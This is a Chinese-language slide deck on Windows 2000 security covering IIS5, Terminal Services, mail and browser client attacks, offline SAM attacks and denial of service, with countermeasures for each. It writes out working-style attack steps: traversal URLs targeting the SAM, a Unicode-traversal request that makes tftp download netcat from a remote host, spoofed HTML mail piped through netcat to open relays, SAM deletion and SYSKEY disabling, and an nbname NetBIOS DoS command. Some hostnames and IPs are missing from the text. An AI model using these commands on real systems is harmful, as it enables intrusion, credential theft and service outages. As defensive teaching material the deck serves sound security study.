Windows2000系統(tǒng)安全(2)-網絡與信息安全

Win2k系統(tǒng)安全(2)E-mail:

1目錄IIS5的安全終端服務器安全MicrosoftInternet客戶端的安全物理攻擊拒絕服務攻擊安全功能和工具2IIS5的安全3IIS5基礎－基本HTTPHTTP：基于文本的無狀態(tài)文件傳輸協(xié)議

虛擬目錄：files映射到該系統(tǒng)磁盤的一個實際目錄上，如c:\inetpub\\files\對于服務器而言則形成如下的請求：

GET/HTTP/1.0若該文件存在，則服務器會向客戶端推送該文件并在客戶端的瀏覽器上顯示；否則會有各種錯誤代碼4IIS5基礎－CGICGI：CommonGatewayInterface，運行在服務器上的應用程序，能針對每個請求生成動態(tài)的內容，擴展了Web功能調用CGI

scripts/cgi.exe?var1+var2Windows中幾乎所有的可執(zhí)行程序都可以作為服務器端的CGI應用程序來執(zhí)行其中cmd.exe經常被作為尋找的目標5IIS5基礎－ASP和ISAPIASP：ActiveServerPagesISAPI:InterfaceServerApplicationProgrammingInterface調用ASP

scripts/script.asp?var1=x&var2=y調用ISAPI

/isapi.dll?var1&var26HTTP攻擊伎倆使用../進行文件系統(tǒng)遍歷URL的十六進制編碼7使用../進行文件系統(tǒng)遍歷/../../../../winnt/secret.txt通常是在目錄上設置不當的NTFS訪問控制列表所導致的/../../../../winnt/repair/sam8URL的十六進制編碼Http允許URL中使用十六進制編碼形式輸入字符串9利用URL的十六進制編碼攻擊/../../winnt/repair/sam％2F％2E％2E％2F％2E％2E％2Fwinnt/repair/sam能避免入侵檢測系統(tǒng)的檢測，或可以導致應用程序錯誤處理輸入10IIS5緩沖區(qū)溢出IPP緩沖區(qū)溢出索引服務ISAPI擴展緩沖區(qū)溢出CodeRed蠕蟲ida/idq緩沖區(qū)溢出FrontPage2000服務器擴展緩沖區(qū)溢出11安全對策在系統(tǒng)驅動器之外的驅動器上安裝Web文件夾Web服務器所在的卷應使用NTFS并謹慎設置ACL移動、刪除或改名可能被利用的可執(zhí)行文件：cacls,xcacls在服務器的Write和ExecuteACL中刪除Everyone和UsersGroup掌握對日志中攻擊標志的分析12將文件寫入Web服務器如在目標機上建立tftp服務器，然后上載文件：GET/scripts/..%c0%af../winnt/system32/tftp.exe?“-i”+1+GET+nc.exec:\nc.exeHTTP/1.0

將netcat寫入到C:\，因為默認情況下所有用戶對C:\具有寫權限如將目標機器上cmd.exe改名為cmdl.exeGET/scripts/..%c0%af../winnt/system32/cmd.exe?+copy+c:\winnt\system32\cmd.exe+c:\cmdl.exeHTTP/1.0其它自動上載工具：如unicodeloader等13通過IIS5提升權限通過InProcesslsapiApps利用RevertToSelf

安裝MS01-026補丁可以解決14源代碼泄漏攻擊起因IIS中的程序缺陷低劣的Web編程技術常見的漏洞+.htr(ism.dll)Webhits(webhits.dll)Translate:f(WebDAV,httpext.dll)WebDAV目錄列表（httpext.dll)15Web服務器安全評估工具StealthHTTPScannerSSLProxy

AchillesWfetchWhisker16Web服務器安全忠告在路由器、防火墻或其它位于Web服務器周邊位置的設備上應用網路級的訪問控制在主機級，阻塞Web服務器上所有不必要的流入和流出連接隨時安裝熱修復：刪除不必要的腳本映射和不使用的ISAPI應用程序DLL禁用不必要的服務在應用Web服務之前，強烈推薦使用SecurityTemplate來對其進行配置17Web服務器安全忠告在系統(tǒng)卷之外建立一個獨立的卷來存放Web根目錄Web服務器所在的卷應使用NTFS文件系統(tǒng)，明確的設置ACL刪除Everyone、Users和其它非特權組所在目錄上的寫文件和執(zhí)行文件權限不要將私有數據保存在ASP文件或包含有文件中停止AdministrationWeb站點，刪除IISAdmin和IISHelp虛擬目錄以及它們對應的真實目錄18目錄IIS5的安全終端服務器安全MicrosoftInternet客戶端的安全物理攻擊拒絕服務攻擊安全功能和工具19終端服務器安全20TSWindows2000提供了交互式的圖形化遠程shell，稱為終端服務(TerminalService，TS)，適用于遠程管理或應用程序共享引用的說法，“Windows2000終端服務使你能夠從各種設備上，通過幾乎任何類型的網絡連接遠程的基于Windows2000的服務器，并在其上遠程執(zhí)行應用程序”21TSTS緊密集成在操作系統(tǒng)內部，免費提供遠程管理模式(最多有兩個同時連接的會語以及一個控制臺)TS可以在你和服務器之間提供不同的認證和加密方法。對Windows2000來說，終端服務器正在逐漸成為與UNIX世界中的SSH一樣重要的圖形化產品22TS的代價

在本節(jié)中，我們將從安全的角度來考查TS的基本功能、如何識別和枚舉TS、解決不合理的TS實現(xiàn)的問題、已知的針對TS的攻擊，以及在網絡環(huán)境中保護和管理TS的基本知識23TS組件服務器遠程桌面協(xié)議(RemoteDesktopProtocol，RDP)客戶端24TS服務器TS集成在所有Windows2000服務器中，通過控制面板中的Windows組件功能可以很容易地啟用和禁用在以管理模式安裝時，服務器是標準的組件；當作為遠程應用程序服務器時，它需要額外的授權費用和架構服務器的默認監(jiān)聽端口為TCP3389(稍后將會介紹自行指定端口是很容易的)25遠程桌面協(xié)議(RDP)在客戶端和服務器之間的數據傳輸是通過Microsoft的基于TCP的遠程桌面協(xié)議(RDP-5)進行的RDP提供了三層加密以確保點對點數據傳輸的安全性：40、56或128位RC4與WindowsNT版本的RDP-4相比，Windows2000提供了更多的基本功能，可以在大多數的網絡環(huán)境中高效的使用26客戶端通過MS安裝程序(MSI)軟件包安裝的獨立的16位或32位可執(zhí)行文件終端服務高級客戶端(TerminalServicesAdvancedAlient，TSAC)，基于Win32的ActiveX控件，可以在Web頁面中使用MMC管理單元

盡管它們互相之間存在明顯的區(qū)別，但各種不同的客戶端都用完全相同的方法來實現(xiàn)RDP。因此，盡管它們看起來似乎不一樣，但所有的TS客戶端在與服務器進行對話時都以完全相同的方式進行操作27修改TS監(jiān)聽端口－服務器端通過修改下面的注冊表鍵值，TS的默認端口可以重新指定

\HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp鍵值：PortNumberREG_DWORD=338928修改TS監(jiān)聽端口－客戶端第一步是在TS客戶端連接管理器中與目標主機建立連接一旦創(chuàng)建了一個連接之后，選定該連接并從File菜單中選擇Export，將全部配置設置保存到以一個CNS為擴展名的文本文件中去使用文本編輯器打開這個文件，將ServerPort修改為在服務器上指定端口，如下例所示(自定義連接端口為7777)

29修改TS監(jiān)聽端口－客戶端[CorpTermServ]WinPosStr=0,2,0,0,941,639Expand=1SmoothScrolling=0ShadowBitmapEnabled=1DedicatedTerminal=0ServerPort=7777EnableMouse=1[etc.]

30識別和查找TS3389端口掃描TSProbeTSEnum

31攻擊TS密碼猜測攻擊用戶權限提升畸形RDP拒絕服務攻擊

32密碼猜測攻擊-TSGrinder.exeTS登錄等價于真正的交互式登錄，因此對真正的Administrator賬戶是不能設置鎖定閾值的。這意味著在啟用了TS服務的情況下，對密碼猜測攻擊來說，本地Administrator賬戶是一個最易受攻擊的目標TimMullen開發(fā)了TSGrinder的工具，它能夠通過TS對本地Administrator賬戶進行字典攻擊33密碼猜測攻擊-TSGrinder.exeTSGrinder使用TS的ActiveX控件來進行攻擊。盡管這個ActiveX控件經過特殊的設計可以拒絕對密碼方法的腳本訪問，但通過C++中的vtable綁定仍然可以訪問ImsTscNonScriptable接口方法。這允許為該控件編寫自定義的接口，于是攻擊者就可以對Administrator賬戶進行密碼猜測，直至猜測出密碼上提供下載

34密碼猜測攻擊的防御推薦將本地Administrator賬戶改名防御TS密碼猜測攻擊的另一種有趣的方法是為Windows登錄窗口制作一個自定義的法律聲明，通過添加或編輯如下的注冊表鍵值就可以實現(xiàn)：HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon

35用戶權限提升推薦實現(xiàn)Windows2000ResourceKit中的一些關鍵功能其中最重要的是，“Appsec”可以使管理員能夠限制用戶只能運行特定的應用程序這能夠減小攻擊者在獲取本地用戶訪問之后進行權限提升攻擊的危險

36IME遠程Root獲取輸入法編輯器(InputMethodEditor，IME)漏洞，這個漏洞導致可以不用提供任何憑據就能通過TS的認證IME用來將標準的101鍵鍵盤映射到某種語言中的大量可用字符，例如日語、中文和韓國語都需要IME。雖然IME通常在本地用戶的上下文中進行正常操作，但登錄時，IME卻在SYSTEM上下文中運行。這使得通過遠程服務器的登錄屏幕運行精心設計的命令成為可能37IME對策只有簡體中文版系統(tǒng)或在初始安裝過程中安裝了簡體中文IME的系統(tǒng)才會有這個漏洞Microsoft發(fā)布的公告MS00-069和補丁能夠為所有受影響的版本解決這個問題38畸形RDP拒絕服務2001年1月，YoichiUbukata和YoshihiroKawabata發(fā)現(xiàn)了RDP中的一個漏洞，這個漏洞可能導致拒絕服務的情況出現(xiàn)。如果攻擊者發(fā)送一種畸形的報文，它將使RDP癱瘓。這種攻擊會導致當前正在進行的全部工作丟失，并且需要重新啟動系統(tǒng)才能恢復服務Microsoft發(fā)布了一個補丁(MS01-006)，通過修改終端服務器服務使它正確地處理數據，從而消除這個漏洞39目錄IIS5的安全終端服務器安全MicrosoftInternet客戶端的安全物理攻擊拒絕服務攻擊安全功能和工具40MicrosoftInternet

客戶端安全41攻擊類型緩沖區(qū)溢出，可被用來執(zhí)行任意的代碼而無需與用戶進行任何交互通過欺騙、強制或暗中執(zhí)行命令，使用戶運行由攻擊者預先選擇的可執(zhí)行內容。這種方法有以下一些變化：

■

巧妙偽裝的、看起來無害的電子郵件附件■ 嵌入在HTMLWeb頁面或電子郵件中的可執(zhí)行內容■ 活動內容技術的漏洞導致非法代碼的執(zhí)行■ ActiveX控件，尤其是那些標記有“可以在腳本中安全使用”的控件■

Java虛擬機的程序缺陷(BrownOrifice)42攻擊類型訪問腳本/自動化接口，例如Outlook地址簿蠕蟲寫本地文件，通常是在可執(zhí)行的目錄中；經常通過臨時目錄或緩存位置的不適當泄露發(fā)生。一旦在本地寫入文件，它就可以執(zhí)行并運行在本地計算機安全區(qū)域的上下文中，從而是完全受到信任的讀取本地文件，例如通過HTML跨幀導航問題或使用IFRAME。這種技術的一個常見結果是從Web瀏覽器的cookie中獲取用戶的密碼數據調用客戶端出站連接43實現(xiàn)Internet客戶端攻擊44惡意Web頁面客戶端的一種最常見形式是在Internet上部署惡意的Web服務器，存放經過精心設計的內容，用來誘騙用戶的數據這種方法的有效性取決于提高惡意Web站點/頁面的訪問量，這通常是通過電子郵件或新聞組/列表文章來進行的45惡意E-mail由于HTML功能的多樣性(嵌入小程序或控件、活動腳本、跨幀瀏覽、內聯(lián)幀、cookie解析等等)，HTML電子郵件成為理想的攻擊媒介由于接收端的漏洞導致這樣的問題，Microsoft雖然備受指責，然而通過Outlook或OutlookExpress(OE)這樣的程序發(fā)送惡意編寫的HTML卻十分困難。這些圖形化的電子郵件客戶端不允許對郵件消息的內容進行直接的操作，而為實現(xiàn)攻擊目的卻需要這樣做如果要在Windows上模擬這種命令行功能，可以通過命令行提示符直接向簡單郵件傳輸協(xié)議(SimpleMailTransferProtocol，SMTP)服務器手動發(fā)送消息。最佳的辦法是將適當的SMTP命令和數據寫入到一個文本文件中，然后通過管道輸入給netcat46EmailHacking首先，將所需的SMTP命令和消息數據寫入到一個文件中mailfrom:<mallory@>rcptto:<>datasubject:Readthis!Importance:highMIME-Version:1.0Content-Type:text/html;charset=us-asciiContent-Transfer-Encoding:7bit<HTML><h2>HelloWorld!</h2></HTML>.quit47EmailHacking然后在命令行中將這個文件通過管道傳遞給netcat，而netcat則應該指向適當的郵件服務器的SMTP監(jiān)聽端口25，例如：C:\>typemalicious.txt|2548EmailHacking惡意的攻擊者通常會選擇一些提供無限制的SMTP消息中繼的不引人注意的郵件服務器，而且會盡可能隱藏他們自己的源IP地址，這樣就不可能通過郵件服務器的日志來追查到他們這樣的“開放式SMTP中繼”通常被垃圾郵件所利用，在Usenet的討論或上經?？梢哉业竭@樣的服務器49EmailHacking如果希望隨HTML格式的消息發(fā)送一個附件，則必須向消息中添加另一個MIME部分，根據MIME規(guī)范(RFC2045-49)用Base64格式對附件進行編碼用以自動完成這項工作的最佳工具是JohnG.Myers的mpack。mpack能夠自動添加正確的MIME頭，這樣它的輸出就可以直接發(fā)送給SMTP服務器下面的例子使用mpack對一個名為plant.txt的文件進行編碼，輸出到文件plant.mim中。可選的-s參數用以指定消息的主題行

C:\>mpack-sNasty-gram-oplant.mimplant.txt50EmailHacking下面將MIME部分插入到現(xiàn)有的HTML格式的消息中去對前面的malicious.txt來說，使用“Content-Type:”一行中自定義的MIME邊界來劃分該消息。MIME邊界以兩個連字符開始，結束邊界以兩個連字符為后綴。還要注意嵌套的“multipart/alternative”MIME部分(boundary2)，這樣Outlook接收者就能夠正確地對HTML消息正文進行解碼一定要十分注意換行的位置，因為MIME的解析根據它們的位置有著很大的不同。這個消息的重要性被設置為high(高)，這是誘使受害者上當受騙的一個伎倆51EmailHacking52EmailHacking使用管道將這個文件輸入給netcat，并發(fā)送給開放的SMTP服務器，就能夠向發(fā)送一封HTML格式的消息，并包含附件plant.txt要更好地理解多部分消息中的MIME邊界，參考RFC2046的第5.1.1節(jié)。在OutlookExpress中對收到的消息進行研究，也可以進一步了解其格式單擊Properties|Details|MessageSource就可以查看原始數據(Outlook不允許查看全部的原始SMTP數據)53緩沖區(qū)溢出如果在每天使用的軟件——電子郵件客戶端中存在緩沖區(qū)溢出的漏洞，那么問題就很可怕了。在漏洞得到修正之前，任何使用存在問題的軟件的人都將成為目標2000年7月18日；UndergroundSecuritySystemsResearch(USSR)公布了GMT令牌緩沖區(qū)溢出漏洞，Outlook和OutlookExpress(OE)的用戶隨之發(fā)現(xiàn)了這一點。通過將GMT令牌放在郵件消息的日期字段中并寫入一個超長的值，Outlook和OE就會在POP3和IMAP4下載這樣的消息時崩潰。如果可以發(fā)送精心設計的日期字段，攻擊者選定的程序就可以封裝在GMT值中并執(zhí)行Outlook用戶需要預覽、閱讀、回復或轉發(fā)這樣的消息；OE用戶簡單地打開含有該消息的文件夾，在消息處理時就會自動發(fā)生——OE就會永久性地崩潰，除非清除郵箱54Outlook/OEvCard緩沖區(qū)溢出這個問題最早由JoelMoses發(fā)現(xiàn)，通過打開特定字段中含有大量文本數據的vCards，就可以利用InternetExplorer中的緩沖區(qū)溢出vCards是1996年發(fā)明的一種電子名片格式，1998年進入RFCvCards以.vcf為文件擴展名。因為在讀取vCards時必須解析大量的數據字段，因此它們成為緩沖區(qū)溢出攻擊的最佳目標55Outlook/OEvCard緩沖區(qū)溢出盡管受害者必須顯式地運行vCard，但由于它是一種方便的個人數據交換格式，因此大多數人都不會有任何的猶豫在默認情況下，Outlook會直接從郵件附件運行vCards而不對用戶進行提示，除非安裝了Office安全更新。在直接打開磁盤上的.vcf文件時，不會出現(xiàn)提示56Outlook/OEvCard緩沖區(qū)溢出vCards采用非常簡單的ASCII結構，下面的例子是一個名為JohnDoe.vcf的vCard(為了簡明起見，刪除了一些可選的字段)：57Outlook/OEvCard緩沖區(qū)溢出如果可選的BDAY(生日)字段超過55個字符，運行它就會導致Outlook終止并溢出含有大量文本數據的EMAIL字段也會導致同樣的結果，而在N(姓名)字段中填入大量的文本數據會導致Outlook占用99%的系統(tǒng)CPU資源主要的問題似乎在于Outlook的地址簿，它在試圖從vCard導入超長的字段時發(fā)生阻塞。用戶將存在問題的vCard復制到他們的Outlook/OE的聯(lián)系人文件夾中，通過Windows資源管理器，或通過嵌入在Web頁面或電子郵件消息中的鏈接打開它時，也會發(fā)生問題58其它緩沖區(qū)溢出Windows媒體播放器.asx緩沖區(qū)溢出GeorgiGuninski和RichardSmith發(fā)現(xiàn)的ActiveX“SafeforScripting（腳本安全）”問題Access數據庫實例化IE5中執(zhí)行VBA代碼59寫本地文件將文件寫入本地磁盤，如果能夠寫入任意的文件然后又能夠執(zhí)行它們，那么麻煩就大了。如果文件已經寫入到磁盤上，那么只有文件系統(tǒng)ACL和它們與用戶賬戶權限的交集能夠確定哪些能夠被執(zhí)行而哪些不能，因此只要過了第一關，第二步就很容易了。這種攻擊的一種聰明的變種是識別磁盤上可以可靠地寫入數據的靜態(tài)位置——例如，Internet臨時緩存文件的名稱和位置是可以預測的。這使得攻擊者可以實現(xiàn)“選定文件內容”攻擊，在文件里面他們可以精心設計惡意的腳本或是其他提交給Internet客戶端的指令，以便可以寫入到這些可預測的位置之一。一旦完成了這一步，那么通過IFRAME或其他的技術從已知的位置執(zhí)行這些腳本就很容易了60執(zhí)行被寫入臨時Internet緩存的.chm文件GeorgiGuninski的第28號公告描述了這個漏洞。它涉及到4個基本的步驟，它們都是在IE或Outlook/OE中裝載HTML時進行的：1. 使用一些HTML代碼，向IE的Internet臨時文件緩存中寫入一系列相同的經過特殊設計的已編譯HTML幫助文件(.chm)2. 從第一份HTML文檔中，裝載第二份HTML文檔，第二份文檔位于另一臺服務器上，該服務器的名稱與存放父文檔的服務器的名稱不同3. 識別Internet臨時緩存文件夾的位置4. 在查點出的緩存文件夾中執(zhí)行.chm文件61通用對策仔細配置出站網關訪問控制，阻塞除由公司策略明顯允許的通信之外的全部通信。客戶端攻擊的最可怕的一種可能就是調用與惡意服務器之間的出站連接在不安全的協(xié)議上，例如telnet或SMB不要在重要的服務器

上讀取郵件或瀏覽Web不要在重要的服務器上安裝MicrosoftOffice在瀏覽Web和讀取郵件時，盡可能使用非特權用戶身份，而不要用Administrator62通用對策堅持原則——不要點擊不可信的鏈接或查看不可信的電子郵件附件，最好將其刪除一定要及時升級Internet客戶端軟件。目前，使用Windows更新站點來自動檢測和安裝你需要的補丁(Microsoft計劃在2001年夏天推出一個新的工具，以幫助用戶確定他們的IE/OE和Outlook需要安裝哪些補丁)。在編寫本書時，IE5.5是Microsoft的核心Internet客戶端的最新版本，并且ServicePack1也已經發(fā)布。在IE中，檢查Help|About以查看已經安裝了哪些補丁，并且確保你正在使用128位加密強度63通用對策不要忘了及時到Office更新站點上對Office進行更新。特別的，確保你已經安裝了Outlook電子郵件安全更新適當的設置IE的SecurityZone，包括禁用RestrictedSite區(qū)域中的全部功能，然后配置Outlook/OE使用該區(qū)域讀取電子郵件將安全策略中的Windows2000LANManager認證級別設置為SendNTLMv2ResponseOnly。這能夠降低對SMB認證進行竊聽攻擊的危險(但不能阻止惡意服務器和MITM攻擊)64通用對策禁用Windows2000telnet客戶端的NTLM認證(在命令行中執(zhí)行telnet命令，然后輸入unsetntlm，然后用quit退出)。這能夠避免在對telnet://鏈接進行反應時NTLM憑據在網絡上傳播在所有的Office應用程序的Tools|Macro|Security中將宏安全性設置為High(高)。這有助于避免Office文檔中的惡意宏腳本進行的攻擊65通用對策在客戶端和郵件服務器上，及時更新防病毒標識數據庫部署基于網關和郵件服務器的過濾系統(tǒng)，剔除Web頁面和電子郵件中的惡意內容如果這些提示沒能使你感到安全，那么不要再使用MicrosoftInternet客戶端(如果你運行Windows2000，那么實際上這是不可能的)66目錄IIS5的安全終端服務器安全MicrosoftInternet客戶端的安全物理攻擊拒絕服務攻擊安全功能和工具67物理攻擊68物理攻擊如果入侵者能夠不受限制地在物理上訪問一臺Windows2000系統(tǒng)，那么他們如何進行攻擊呢？本節(jié)將從物理的角度探討攻擊者如何從Windows2000獲取數據，通常的方法是引導到另外的操作系統(tǒng)并在離線的狀態(tài)下對系統(tǒng)的屬性進行編輯69對SAM進行離線攻擊破解通常依賴于獲取NT/2000的密碼數據庫——安全賬戶管理器(SecurityAccountsManager，SAM)文件通過離線攻擊，SAM的內容也可以被壞人獲取，只需引導到另一種操作系統(tǒng)，然后將SAM復制到可移動媒體或網絡共享中首先介紹一些經典的離線攻擊技術，然后分析這些攻擊對EFS潛在的影響。最后，討論EFS攻擊的一個例子，它不需要在離線狀態(tài)下訪問系統(tǒng)70通過刪除SAM廢除Administrator密碼通過在系統(tǒng)處于離線狀態(tài)時刪除SAM文件，然后就可以在系統(tǒng)重新啟動后以空密碼登錄Administrator賬戶。這種方法同時也刪除了目標系統(tǒng)上所有現(xiàn)有的用戶賬戶，但與磁盤上的重要數據相比，攻擊者并不考慮這一點這種攻擊有多種實現(xiàn)方式，但最直接的方法是制作一張可引導的DOS系統(tǒng)軟盤，并將Sysinternal的ntfsdospro復制到軟盤上。然后這張軟盤就可以用來將目標系統(tǒng)引導到DOS71通過刪除SAM廢除Administrator密碼如果目標系統(tǒng)使用FAT或FAT32，那么只需輸入以下命令就可以刪除SAM文件：

A:\>delc:\winnt\system32\config\sam如果目標系統(tǒng)使用NTFS文件系統(tǒng)，那么可以使用ntfsdospro將NTFS卷裝載到DOS中，然后使用相同的命令來刪除SAM72通過刪除SAM廢除Administrator密碼當系統(tǒng)稍后重新啟動時，Windows2000將重新創(chuàng)建一個默認的SAM文件，它含有Administrator賬戶，而且密碼為空。只需使用這個賬戶和密碼登錄，就可以獲得對系統(tǒng)的全面控制這里需要注意的是，刪除SAM并不會影響Windows2000域控制器，因為它們沒有把密碼散列保存在SAM中。然而，Grace和Bartlett的文章指出了一種方法，通過在域控制器上安裝另一份Windows2000，就可以獲得基本相同的效果73通過使用chntpw對SAM進行散列注入如果你希望使用更為成熟的物理攻擊方法，不想破壞掉系統(tǒng)中全部的賬戶，可以使用一張Linux引導軟盤和PetterNordahl-Hagen的chntpw，在離線狀態(tài)將密碼散列注入到SAM中即使在應用了SYSKEY時，或即使選擇了用密碼來保護SYSKEY或將它保存在軟盤上的選項，注入仍然能夠奏效！74通過使用chntpw對SAM進行散列注入Petter說明了如何將SYSKEY關閉。更糟的是，他發(fā)現(xiàn)攻擊者并不需要這樣做——只需將舊的、未經SYSKEY處理的散列直接注入到SAM中，在重新啟動后，它就會自動被轉換為SYSKEY散列75關閉SYSKEY的方法1. 將HKLM\System\CurrentControlSet\Control\Lsa\SecureBoot設置為0以禁用SYSKEY(這個鍵的可能取值為：0——禁用；1——不受保護的密鑰保存在注冊表中；2——密鑰保存在注冊表中，受密碼保護；3——密鑰保存在軟盤上)2. 將二進制結構HKLM\SAM\Domains\Account\F中的一個特殊標志位修改為以前SecureBoot的相同模式。在系統(tǒng)處于運行狀態(tài)時，這個主鍵是不能訪問的3. 在Windows2000中，HKLM\security\Policy\PolSecretEncryptionKey\<default>主鍵也需要被修改為與以前的兩個主鍵相同的值76通過使用chntpw對SAM進行散列注入根據Petter的說法，在NT4SP6之前的系統(tǒng)上只修改前兩個值中的一個會導致在完全引導之后出現(xiàn)一個警告，指出SAM和系統(tǒng)設置之間的不一致性，SYSKEY會被重新啟用。而在Windows2000上，在重新啟動之后，這3個鍵值之間的不一致似乎直接被重置為最可能的值77目錄IIS5的安全終端服務器安全MicrosoftInternet客戶端的安全物理攻擊拒絕服務攻擊安全功能和工具78拒絕服務攻擊79拒絕服務(DenialofService，DoS)攻擊并不是以竊取用戶賬戶或系統(tǒng)數據為直接目的，而是使系統(tǒng)拒絕合法用戶對系統(tǒng)服務的訪問DoS可以有很多種形式，例如通過耗盡系統(tǒng)資源，使合法用戶訪問站點的請求失敗，或者通過一個精心制作的與RFC不兼容的報文導致操作系統(tǒng)的掛起在某些情況下，如果攻擊需要目標計算機重新啟動才能完成，DoS實際上被用來輔助對系統(tǒng)的入侵80TCP連接淹沒TCP連接淹沒（connectflood）方法有時也被稱為進程表攻擊（processtableattack）。顧名思義，這種方法是與目標之間建立盡可能多的TCP連接，直到目標由于資源耗盡而不能再為請求提供服務為止TCP連接淹沒比曾經流行的TCPSYN淹沒攻擊更為先進，因為它實際上完成了3次握手過程，使目標計算機上的所有套接字都處于ESTABLISHED狀態(tài)。最終，所有的套接字都被耗盡，目標就不能再接受任何新的連接，而不管它還具有多少可用的內存、帶寬、CPU時間等81TCP連接淹沒這確實是一種非常有破壞力的攻擊，而且只要攻擊者能夠訪問任一個監(jiān)聽服務(例如TCP80端口上的WWW服務)，那么幾乎沒有什么防御方法攻擊工具：Portfuck82應用程序服務級DoS攻擊IIS的WebDAVtelnet服務器83基于LAN的DoS攻擊在面向LAN的Windows2000DoS攻擊中，大多數都與NetBIOS有關。NetBIOS的傳統(tǒng)問題是它依賴于不可靠的、無認證的服務。它提供了一種IP地址與NetBIOS名稱間相互映射的方法，很容易被偽裝，因此任何可以連接到本地網絡中的人都可以通過聲稱已經注冊了其他合法客戶端的NetBIOS名稱或者向特定的主機發(fā)送“名稱釋放”報文，從而使合法客戶端斷開網絡收到這種報文的客戶端將會完全丟失加入NetBIOS網絡的能力，包括訪問文件共享、Windows域認證等等84基于LAN的DoS攻擊下面是使用nbname對一臺主機進行DoS攻擊的例子。在Windows2000上，你必須首先禁用TCP/IP上的NetBIOS，以避免它與真正的NBNS服務發(fā)生沖突，因為NBNS服務通常會大量地使用UDP端口137。然后，運行nbname(使用你要攻擊的主機的IP地址代替這里的22)：C:\>nbname/astat22/conflict85基于LAN的DoS攻擊其中/ASTAT參數用于從目標獲取遠程適配器的狀態(tài)，/CONFLICT參數向響應適配器狀態(tài)請求的計算機的遠程名稱表格中的全部名稱發(fā)送名稱釋放報文通過使用/QUERY[nameIP]/CONFLICT/DENY[name_or_file]參數，攻擊者可以對整個網絡進行DoS攻擊86基于LAN的DoS攻擊在受害主機上，可能會出現(xiàn)下列癥狀：網絡連接時斷時續(xù)網絡鄰居(NetworkNeighborhood)等工具不能正常工作netsend命令不能正常工作受影響的服務器不能認證域登錄不能訪問共享資源和基礎的NetBIOS服務，例如NetBIOS名稱解析nbtstat

命令會將NetBIOS名稱服務的狀態(tài)顯示為Conflict(沖突)87Windows2000DDoS僵尸在2000年2月之后，“僵尸”(zombie)這個詞開始流行起來，用以代指那些被用來攻擊受害者的無辜的DDoS客戶端TribeFloodNetwork(TFN)TrinooStacheldrahtTFN2KWinTrinoo88防御DoS－聯(lián)合你的ISP聯(lián)系你的Internet服務供應商(ISP)，詢問他們能夠為防止你的連接受到DoS攻擊而提供何種措施(如果有)。幾乎所有的Internet連接都要經過ISP，不管你的DoS防御策略是多么牢固，如果ISP的連接斷開或是飽和，你的措施就沒有任何意義89防御DoS－聯(lián)合你的ISP在站點受到攻擊時，你的ISP能夠做出什么反應。如果可能的話，將你的ISP的網絡操作中心(NOC)的聯(lián)系信息放在手邊記住，跟蹤找到攻擊的發(fā)起者是很困難的，但如果你的ISP肯合作并且能夠訪問你和攻擊者之間的路由器，這也是可能實現(xiàn)的90防御DoS－配置邊界路由器通過適當的配置路由器，可以相當有效地減輕DoS攻擊的危害強烈推薦讀者參考“Cisco對分布式拒絕服務攻擊(DDoS)的策略”。該文章討論了CiscoIOS配置，例如驗證單播逆向路徑、過濾RFC1918私有地址、應用進出口過濾、速率限制、ICMP和UDP過濾等，對目前的Internet環(huán)境來說，這些是基本的常用配置./warp/public/707/newsflash.html91防御DoS及時安裝補丁合理配置TCP/IP參數92合理配置TCP/IP參數93合理配置TCP/IP參數94目錄IIS5的安全終端服務器安全MicrosoftInternet客戶端的安全物理攻擊拒絕服務攻擊安全功能和工具95安全模板和安全配置分析組策略IPSecKerberos加密文件系統(tǒng)(Encrypted，EFS)RunasWindows文件保護(Windows，WFP)96安全模板、安全配置和分析安全模板(SecurityTemplate)、安全配置和分析(SecurityConfigurationandAnalysis)是在Windows2000環(huán)境中部署安全體系時所能使用的最能夠節(jié)省時間的工具，特別是在與組策略聯(lián)合使用時安全模板是Windows2000中與安全有關的設置的結構化列表，通過點擊鼠標就可以編輯和應用，而無需去尋找和配置本書中已經討論過的大量分散的安全設置。另外，這些模板文件可以與系統(tǒng)的當前設置進行比較，從而顯示出一致和不一致的配置(即分析功能)97安全模板、安全配置和分析通過打開一個空白的Microsoft管理控制臺(MMC)，然后添加安全模板、安全配置和分析管理單元，就可以使用這兩項工具98組策略組策略(GroupPolicy)是Windows2000提供的功能最強大的新工具之一，它的作用已經遠遠超出了安全設置的范圍組策略是Windows2000的集中化管理配置管理體系。它是由組策略對象(GroupPolicyObject，GPO)實現(xiàn)的，GPO定義了可以被應用于(或鏈接到)用戶和計算機的配置參數。GPO有兩種類型：本地GPO(LGPO)和活動目錄GPO(ADGPO)99組策略LGPO保存在%systemroot%\system32\GroupPolicy目錄中，由以下一些文件組成：gpt.ini，管理模板(.adm)，安全配置文件(.pol)，以及登錄/注銷和啟動/關機腳本ADGPO存儲在%systemroot%\system32\sysvol\<domain>\Policies目錄中，活動目錄中的System|Policy容器中也保存了指向每個ADGPO的指針LGPO只作用于本地計算機。ADGPO則可以應用于站點(site)、域(domain)、組織單位(OrganizationalUnit，OU)，而且多個GPO可以鏈接到同一個站點、域或OU100組策略與安全相關的GPO設置集中在ComputerConfiguration\Win-dowsSettings\SecuritySettings結點之下SecuritySettings(安全策略)結點定義了賬戶策略、審核策略、事件日志、公鑰和IPSec策略由于這些參數可以在站點、域、OU級別上進行設置，大型網絡環(huán)境中的安全管理工作的負擔就可以減輕很多。更好的是，安全模板可以被導入到一個GPO中。